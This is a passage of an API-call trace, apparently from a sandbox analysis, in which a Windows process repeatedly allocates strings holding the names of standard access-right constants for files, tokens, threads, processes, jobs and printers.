[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a3ebb0*="FILE_ALL_ACCESS") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3eb80*="STANDARD_RIGHTS_READ") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3eb70*="STANDARD_RIGHTS_ALL") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3eb50*="DELETE") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3eb40*="READ_CONTROL") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3eb30*="WRITE_OWNER") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3eb20*="WRITE_DAC") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a3eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a3eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a3eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a3eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a3ead0*="TOKEN_QUERY_SOURCE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a3eac0*="TOKEN_QUERY") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a3eab0*="TOKEN_IMPERSONATE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a3eaa0*="TOKEN_DUPLICATE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a3ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3ea80*="TOKEN_ALL_ACCESS") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3ea50*="STANDARD_RIGHTS_READ") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3ea40*="STANDARD_RIGHTS_ALL") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ea30*="DELETE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ea20*="READ_CONTROL") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ea10*="WRITE_OWNER") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ea00*="WRITE_DAC") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e9f0*="TIMER_MODIFY_STATE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a3e9e0*="TIMER_QUERY_STATE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e9d0*="TIMER_ALL_ACCESS") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e9a0*="STANDARD_RIGHTS_READ") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e990*="STANDARD_RIGHTS_ALL") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e980*="DELETE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e970*="READ_CONTROL") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e960*="WRITE_OWNER") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e950*="WRITE_DAC") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a3e940*="SECTION_EXTEND_SIZE") returned 1
[0090.542] SysReAllocStringLen (in: pbstr=0x2a3e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a3e930*="FILE_MAP_READ") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a3e920*="FILE_MAP_WRITE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a3e910*="FILE_MAP_COPY") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a3e900*="FILE_MAP_ALL_ACCESS") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e8d0*="STANDARD_RIGHTS_READ") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e8b0*="DELETE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e8a0*="READ_CONTROL") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e890*="WRITE_OWNER") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e880*="WRITE_DAC") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e870*="MUTEX_MODIFY_STATE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e860*="MUTEX_ALL_ACCESS") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e840*="STANDARD_RIGHTS_WRITE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e830*="STANDARD_RIGHTS_READ") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e820*="STANDARD_RIGHTS_ALL") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e810*="DELETE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e800*="READ_CONTROL") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e7f0*="WRITE_OWNER") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e7e0*="WRITE_DAC") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e7d0*="EVENT_MODIFY_STATE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e7c0*="EVENT_ALL_ACCESS") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e790*="STANDARD_RIGHTS_READ") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e780*="STANDARD_RIGHTS_ALL") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e770*="DELETE") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e760*="READ_CONTROL") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e750*="WRITE_OWNER") returned 1
[0090.543] SysReAllocStringLen (in: pbstr=0x2a3e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e740*="WRITE_DAC") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a3e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a3e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e700*="STANDARD_RIGHTS_WRITE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e6f0*="STANDARD_RIGHTS_READ") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e6d0*="DELETE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e6c0*="READ_CONTROL") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e6b0*="WRITE_OWNER") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e6a0*="WRITE_DAC") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a3e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a3e680*="JOB_OBJECT_TERMINATE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a3e670*="JOB_OBJECT_QUERY") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a3e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a3e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e620*="STANDARD_RIGHTS_WRITE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e610*="STANDARD_RIGHTS_READ") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e600*="STANDARD_RIGHTS_ALL") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e5f0*="DELETE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e5e0*="READ_CONTROL") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e5d0*="WRITE_OWNER") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e5c0*="WRITE_DAC") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a3e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a3e5a0*="THREAD_IMPERSONATE") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a3e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a3e580*="THREAD_QUERY_INFORMATION") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a3e570*="THREAD_SET_INFORMATION") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a3e560*="THREAD_SET_CONTEXT") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a3e550*="THREAD_GET_CONTEXT") returned 1
[0090.544] SysReAllocStringLen (in: pbstr=0x2a3e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a3e540*="THREAD_SUSPEND_RESUME") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a3e530*="THREAD_TERMINATE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a3e520*="THREAD_ALL_ACCESS") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e500*="STANDARD_RIGHTS_WRITE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e4f0*="STANDARD_RIGHTS_READ") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e4d0*="DELETE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e4c0*="READ_CONTROL") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e4b0*="WRITE_OWNER") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e4a0*="WRITE_DAC") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a3e490*="PROCESS_QUERY_INFORMATION") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a3e480*="PROCESS_SET_INFORMATION") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a3e470*="PROCESS_SET_QUOTA") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a3e460*="PROCESS_CREATE_PROCESS") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a3e450*="PROCESS_DUP_HANDLE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a3e440*="PROCESS_VM_WRITE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a3e430*="PROCESS_VM_READ") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a3e420*="PROCESS_VM_OPERATION") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a3e410*="PROCESS_SET_SESSIONID") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a3e400*="PROCESS_CREATE_THREAD") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a3e3f0*="PROCESS_TERMINATE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e3e0*="PROCESS_ALL_ACCESS") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e3b0*="STANDARD_RIGHTS_READ") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e390*="DELETE") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e380*="READ_CONTROL") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e370*="WRITE_OWNER") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e360*="WRITE_DAC") returned 1
[0090.545] SysReAllocStringLen (in: pbstr=0x2a3e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a3e350*="PERM_FILE_CREATE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a3e340*="PERM_FILE_WRITE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a3e330*="PERM_FILE_READ") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e310*="STANDARD_RIGHTS_WRITE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e300*="STANDARD_RIGHTS_READ") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e2e0*="DELETE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e2d0*="READ_CONTROL") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e2c0*="WRITE_OWNER") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e2b0*="WRITE_DAC") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a3e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a3e290*="PRINTER_ACCESS_USE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a3e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a3e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a3e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e250*="PRINTER_ALL_ACCESS") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a3e240*="PRINTER_EXECUTE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a3e230*="PRINTER_WRITE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a3e220*="PRINTER_READ") returned 1
